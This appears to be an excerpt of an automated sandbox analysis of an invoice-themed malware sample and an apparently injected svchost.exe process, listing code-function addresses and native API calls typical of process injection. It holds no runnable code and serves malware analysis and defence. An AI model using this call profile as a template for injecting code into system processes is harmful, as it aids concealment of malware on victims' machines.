Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98ACEB 8_2_1E98ACEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947CE8 8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0C12 8_2_1E8B0C12
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EC4C 8_2_1E96EC4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EC60 8_2_1E97EC60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E976C69 8_2_1E976C69
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D2DB0 8_2_1E8D2DB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C9DD0 8_2_1E8C9DD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FD27 8_2_1E97FD27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E977D4C 8_2_1E977D4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0D69 8_2_1E8C0D69
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FA89 8_2_1E97FA89
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFAA0 8_2_1E8DFAA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97CA13 8_2_1E97CA13
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97EA5B 8_2_1E97EA5B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8FDB19 8_2_1E8FDB19
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97FB2E 8_2_1E97FB2E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D6882 8_2_1E8D6882
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9398B2 8_2_1E9398B2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C28C0 8_2_1E8C28C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9718DA 8_2_1E9718DA
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9778F3 8_2_1E9778F3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3800 8_2_1E8C3800
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EE810 8_2_1E8EE810
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960835 8_2_1E960835
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6868 8_2_1E8A6868
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E935870 8_2_1E935870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F872 8_2_1E97F872
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C9870 8_2_1E8C9870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DB870 8_2_1E8DB870
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BE9A0 8_2_1E8BE9A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97E9A6 8_2_1E97E9A6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9059C0 8_2_1E9059C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8899E8 8_2_1E8899E8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0680 8_2_1E8C0680
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97A6C0 8_2_1E97A6C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F6F6 8_2_1E97F6F6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BC6E0 8_2_1E8BC6E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9336EC 8_2_1E9336EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DC600 8_2_1E8DC600
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95D62C 8_2_1E95D62C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96D646 8_2_1E96D646
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E4670 8_2_1E8E4670
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E976757 8_2_1E976757
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C2760 8_2_1E8C2760
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CA760 8_2_1E8CA760
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92D480 8_2_1E92D480
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0445 8_2_1E8C0445
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9775C6 8_2_1E9775C6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F5C9 8_2_1E97F5C9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98A526 8_2_1E98A526
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AD2EC 8_2_1E8AD2EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E882245 8_2_1E882245
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97124C 8_2_1E97124C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1380 8_2_1E8B1380
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CE310 8_2_1E8CE310
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F330 8_2_1E97F330
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F508C 8_2_1E8F508C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B00A0 8_2_1E8B00A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CB0D0 8_2_1E8CB0D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9770F1 8_2_1E9770F1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96E076 8_2_1E96E076
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C51C0 8_2_1E8C51C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DB1E0 8_2_1E8DB1E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98010E 8_2_1E98010E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AF113 8_2_1E8AF113
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95D130 8_2_1E95D130
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E90717A 8_2_1E90717A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B31380 11_2_03B31380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF330 11_2_03BFF330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4E310 11_2_03B4E310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B2D2EC 11_2_03B2D2EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF124C 11_2_03BF124C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B02245 11_2_03B02245
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5B1E0 11_2_03B5B1E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B451C0 11_2_03B451C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDD130 11_2_03BDD130
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B2F113 11_2_03B2F113
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B8717A 11_2_03B8717A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0010E 11_2_03C0010E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B300A0 11_2_03B300A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B7508C 11_2_03B7508C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF70F1 11_2_03BF70F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4B0D0 11_2_03B4B0D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BEE076 11_2_03BEE076
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B42760 11_2_03B42760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4A760 11_2_03B4A760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF6757 11_2_03BF6757
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40680 11_2_03B40680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF6F6 11_2_03BFF6F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3C6E0 11_2_03B3C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB36EC 11_2_03BB36EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFA6C0 11_2_03BFA6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDD62C 11_2_03BDD62C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5C600 11_2_03B5C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B64670 11_2_03B64670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BED646 11_2_03BED646
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF5C9 11_2_03BFF5C9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF75C6 11_2_03BF75C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0A526 11_2_03C0A526
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BAD480 11_2_03BAD480
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40445 11_2_03B40445
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB4BC0 11_2_03BB4BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFB2E 11_2_03BFFB2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40B10 11_2_03B40B10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B7DB19 11_2_03B7DB19
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5FAA0 11_2_03B5FAA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFA89 11_2_03BFFA89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFCA13 11_2_03BFCA13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEA5B 11_2_03BFEA5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3E9A0 11_2_03B3E9A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFE9A6 11_2_03BFE9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B099E8 11_2_03B099E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B859C0 11_2_03B859C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB98B2 11_2_03BB98B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B56882 11_2_03B56882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF78F3 11_2_03BF78F3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF18DA 11_2_03BF18DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B428C0 11_2_03B428C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BE0835 11_2_03BE0835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B6E810 11_2_03B6E810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B43800 11_2_03B43800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B49870 11_2_03B49870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5B870 11_2_03B5B870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB5870 11_2_03BB5870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF872 11_2_03BFF872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B26868 11_2_03B26868
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEFBF 11_2_03BFEFBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B46FE0 11_2_03B46FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF1FC6 11_2_03BF1FC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4CF00 11_2_03B4CF00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFF63 11_2_03BFFF63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B41EB2 11_2_03B41EB2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF0EAD 11_2_03BF0EAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B32EE8 11_2_03B32EE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF9ED2 11_2_03BF9ED2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BE0E6D 11_2_03BE0E6D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B60E50 11_2_03B60E50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B82E48 11_2_03B82E48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B52DB0 11_2_03B52DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDFDF4 11_2_03BDFDF4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B49DD0 11_2_03B49DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFD27 11_2_03BFFD27
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3AD00 11_2_03B3AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40D69 11_2_03B40D69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF7D4C 11_2_03BF7D4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BD9C98 11_2_03BD9C98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0ACEB 11_2_03C0ACEB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BC7CE8 11_2_03BC7CE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5FCE0 11_2_03B5FCE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B58CDF 11_2_03B58CDF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4AC20 11_2_03B4AC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B30C12 11_2_03B30C12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B43C60 11_2_03B43C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF6C69 11_2_03BF6C69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEC60 11_2_03BFEC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BEEC4C 11_2_03BEEC4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9BE9F 11_2_02D9BE9F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82FB0 11_2_02D82FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9CF40 11_2_02D9CF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D88C80 11_2_02D88C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D88C7B 11_2_02D88C7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82D90 11_2_02D82D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82D87 11_2_02D82D87
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B910 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75050 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87BE4 appears 96 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAE692 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBEF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E8F5050 appears 36 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E93EF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E907BE4 appears 95 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E8AB910 appears 268 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E92E692 appears 86 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243265F NtProtectVirtualMemory, 1_2_0243265F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242CB27 NtAllocateVirtualMemory,LoadLibraryA, 1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FCFD NtWriteVirtualMemory, 1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243069C NtWriteVirtualMemory, 1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E8F2EB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk, 8_2_1E8F2ED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E50 NtCreateSection,LdrInitializeThunk, 8_2_1E8F2E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2F00 NtCreateFile,LdrInitializeThunk, 8_2_1E8F2F00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk, 8_2_1E8F2CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_1E8F2DA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_1E8F2DC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk, 8_2_1E8F2D10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_1E8F2B90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk, 8_2_1E8F2BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_1E8F2B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F29F0 NtReadFile,LdrInitializeThunk, 8_2_1E8F29F0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk, 8_2_1E8F34E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E80 NtCreateProcessEx, 8_2_1E8F2E80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EC0 NtQuerySection, 8_2_1E8F2EC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E00 NtQueueApcThread, 8_2_1E8F2E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2FB0 NtSetValueKey, 8_2_1E8F2FB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2F30 NtOpenDirectoryObject, 8_2_1E8F2F30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F3C90 NtOpenThread, 8_2_1E8F3C90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2CD0 NtEnumerateKey, 8_2_1E8F2CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C10 NtOpenProcess, 8_2_1E8F2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C20 NtSetInformationFile, 8_2_1E8F2C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F3C30 NtOpenProcessToken, 8_2_1E8F3C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2D50 NtWriteVirtualMemory, 8_2_1E8F2D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2A80 NtClose, 8_2_1E8F2A80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2AA0 NtQueryInformationFile, 8_2_1E8F2AA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2AC0 NtEnumerateValueKey, 8_2_1E8F2AC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2A10 NtWriteFile, 8_2_1E8F2A10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B80 NtCreateKey, 8_2_1E8F2B80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2BE0 NtQueryVirtualMemory, 8_2_1E8F2BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B00 NtQueryValueKey, 8_2_1E8F2B00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B20 NtQueryInformationProcess, 8_2_1E8F2B20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F38D0 NtGetContextThread, 8_2_1E8F38D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F29D0 NtWaitForSingleObject, 8_2_1E8F29D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F4570 NtSuspendThread, 8_2_1E8F4570
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F4260 NtSetContextThread, 8_2_1E8F4260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B734E0 NtCreateMutant,LdrInitializeThunk, 11_2_03B734E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B90 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_03B72B90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B80 NtCreateKey,LdrInitializeThunk, 11_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72BC0 NtQueryInformationToken,LdrInitializeThunk, 11_2_03B72BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B10 NtAllocateVirtualMemory,LdrInitializeThunk, 11_2_03B72B10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B00 NtQueryValueKey,LdrInitializeThunk, 11_2_03B72B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72A80 NtClose,LdrInitializeThunk, 11_2_03B72A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B729F0 NtReadFile,LdrInitializeThunk, 11_2_03B729F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72F00 NtCreateFile,LdrInitializeThunk, 11_2_03B72F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E50 NtCreateSection,LdrInitializeThunk, 11_2_03B72E50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_03B72DC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72D10 NtQuerySystemInformation,LdrInitializeThunk, 11_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72CF0 NtDelayExecution,LdrInitializeThunk, 11_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C30 NtMapViewOfSection,LdrInitializeThunk, 11_2_03B72C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B74260 NtSetContextThread, 11_2_03B74260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B74570 NtSuspendThread, 11_2_03B74570
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72BE0 NtQueryVirtualMemory, 11_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B20 NtQueryInformationProcess, 11_2_03B72B20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72AA0 NtQueryInformationFile, 11_2_03B72AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72AC0 NtEnumerateValueKey, 11_2_03B72AC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72A10 NtWriteFile, 11_2_03B72A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B729D0 NtWaitForSingleObject, 11_2_03B729D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B738D0 NtGetContextThread, 11_2_03B738D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72FB0 NtSetValueKey, 11_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72F30 NtOpenDirectoryObject, 11_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72EB0 NtProtectVirtualMemory, 11_2_03B72EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E80 NtCreateProcessEx, 11_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72ED0 NtResumeThread, 11_2_03B72ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72EC0 NtQuerySection, 11_2_03B72EC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E00 NtQueueApcThread, 11_2_03B72E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72DA0 NtReadVirtualMemory, 11_2_03B72DA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72D50 NtWriteVirtualMemory, 11_2_03B72D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B73C90 NtOpenThread, 11_2_03B73C90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72CD0 NtEnumerateKey, 11_2_03B72CD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B73C30 NtOpenProcessToken, 11_2_03B73C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C20 NtSetInformationFile, 11_2_03B72C20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C10 NtOpenProcess, 11_2_03B72C10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C50 NtUnmapViewOfSection, 11_2_03B72C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D98690 NtReadFile, 11_2_02D98690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D987C0 NtAllocateVirtualMemory, 11_2_02D987C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D98710 NtClose, 11_2_02D98710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D985E0 NtCreateFile, 11_2_02D985E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9868D NtReadFile, 11_2_02D9868D
